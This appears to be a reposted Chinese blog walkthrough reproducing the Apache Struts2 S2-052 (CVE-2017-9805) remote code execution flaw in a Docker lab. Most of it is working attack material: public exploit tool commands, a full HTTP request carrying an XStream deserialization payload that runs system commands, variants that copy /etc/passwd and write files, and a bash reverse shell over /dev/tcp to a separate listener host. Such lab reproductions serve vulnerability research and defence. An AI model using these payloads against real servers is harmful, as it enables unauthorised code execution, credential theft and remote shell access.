首页 > 其他分享> > S2-052 漏洞复现

S2-052 漏洞复现

2019-10-06 09:52:30 作者：互联网

Structs2框架已知的漏洞编号如下：

S2-005
S2-009
S2-016 (含S2-013)
S2-019
S2-020
S2-021
S2-032
S2-037（含S2-033)
DevMode
S2-045
S2-046
S2-048
S2-052
S2-055
S2-057

S2-052（CVE-2017-9805）环境： https://github.com/Medicean/VulApps/tree/master/s/struts2/s2-052 访问 http://你的 IP 地址:端口号/

漏洞poc检测与利用 poc下载： https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805 检测到漏洞存在： python apache-struts-pwn.py -u 'http://192.168.190.135:8080/orders/3/edit'

漏洞利用写入文件 python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn' POST /orders/3 HTTP/1.1 Host: 192.168.190.135:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/xml Content-Length: 2415 Connection: close Referer: http://192.168.190.135:8080/orders/3/edit Cookie: JSESSIONID=8FCB55C3A30CB6059D3530A01C3E6FA0 Upgrade-Insecure-Requests: 1 DNT: 1 <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>touch</string> <string>/tmp/success</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>

以上数据包成功执行的话，会在docker容器内创建文件/tmp/success，执行docker-compose exec struts2 ls /tmp/即可看到。 docker-compose exec struts2 ls /tmp/

读文件： <command> <string>cp</string> <string>/etc/passwd</string> <string>/tmp/passwd</string> </command> 写文件： <command> <string>bash</string> <string>-c</string> <string>echo micr067 > /tmp/test.txt</string> </command>

反弹shell： <command> <string>bash</string> <string>-c</string> <string>bash -i >&; /dev/tcp/192.168.190.130/1521 0>&;1</string> </command>

参考链接： https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805 https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md

标签：tmp,S2,struts,struts2,复现,apache,com,052
来源： https://www.cnblogs.com/micr067/p/11626531.html